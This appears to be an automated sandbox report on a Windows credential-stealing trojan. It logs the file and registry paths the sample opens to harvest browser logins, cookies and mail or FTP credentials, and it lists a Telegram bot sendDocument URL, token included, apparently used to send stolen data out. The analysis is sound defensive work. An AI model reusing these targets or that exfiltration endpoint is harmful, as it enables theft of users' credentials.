            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Users\user\Desktop\widnOAntje.exe VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\widnOAntje.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: widnOAntje.exe PID: 4812, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: widnOAntje.exe PID: 4812, type: MEMORYSTR
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Users\user\Desktop\widnOAntje.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\widnOAntje.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\widnOAntje.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\widnOAntje.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: Yara matchFile source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: widnOAntje.exe PID: 4812, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: widnOAntje.exe PID: 4812, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: widnOAntje.exe PID: 4812, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            111
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            111
            Security Software Discovery
            Remote Services1
            Email Collection
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            Credentials in Registry
            131
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth11
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            Automated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
            Process Injection
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets114
            System Information Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common2
            Software Packing
            Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Timestomp
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            widnOAntje.exe53%VirustotalBrowse
            widnOAntje.exe33%ReversingLabsWin32.Trojan.Pwsx
            widnOAntje.exe100%Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLinkDownload
            5.2.widnOAntje.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://krdict.korean.go.kr/api/search?key=AEBB6D3290D88C645CF1452F7DA3229D00%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.telegram.org
            149.154.167.220
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/sendDocumentfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://picsum.photos/80widnOAntje.exefalse
                  high
                  https://krdict.korean.go.kr/api/search?key=AEBB6D3290D88C645CF1452F7DA3229D0widnOAntje.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/widnOAntje.exe, 00000005.00000002.25227665436.0000000003411000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://api.telegram.orgwidnOAntje.exe, 00000005.00000002.25227665436.0000000003490000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://api.telegram.orgwidnOAntje.exe, 00000005.00000002.25227665436.00000000034B3000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewidnOAntje.exe, 00000005.00000002.25227665436.0000000003490000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUfalse
                          Joe Sandbox Version:37.0.0 Beryl
                          Analysis ID:830834
                          Start date and time:2023-03-20 18:24:13 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 8s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:widnOAntje.exe
                          Detection:MAL
                          Classification:mal96.troj.spyw.evad.winEXE@3/4@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\Desktop\widnOAntje.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.3584340594103494
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KGN1qE4qXKDE4KhKzKhPKIE4oKXKoZAE4Kz9fhfE4x84j:MIHK5HKGN1qHiYHKhSoPtHokhAHKzTfp
                          MD5:52D666938F0111F0BFD0456A12623437
                          SHA1:0E88A434C23CAD5BC0EF4C11E8E263C824E0530D
                          SHA-256:7C207D29E8EFC73141C4BDD33C763C4CD0286BD8C63E814E7FDEC8C4129B7E51
                          SHA-512:E05AA6A4237D2D69F07DF60BCE2E16B1B1C030D76A966C3B3DF6C6C5754AAD7C5AD2FCD71E0BE5F2320805FC517429555943F2D004AD8EA3AA417E587AAD7BC6
                          Malicious:true
                          Reputation:moderate, very likely benign file
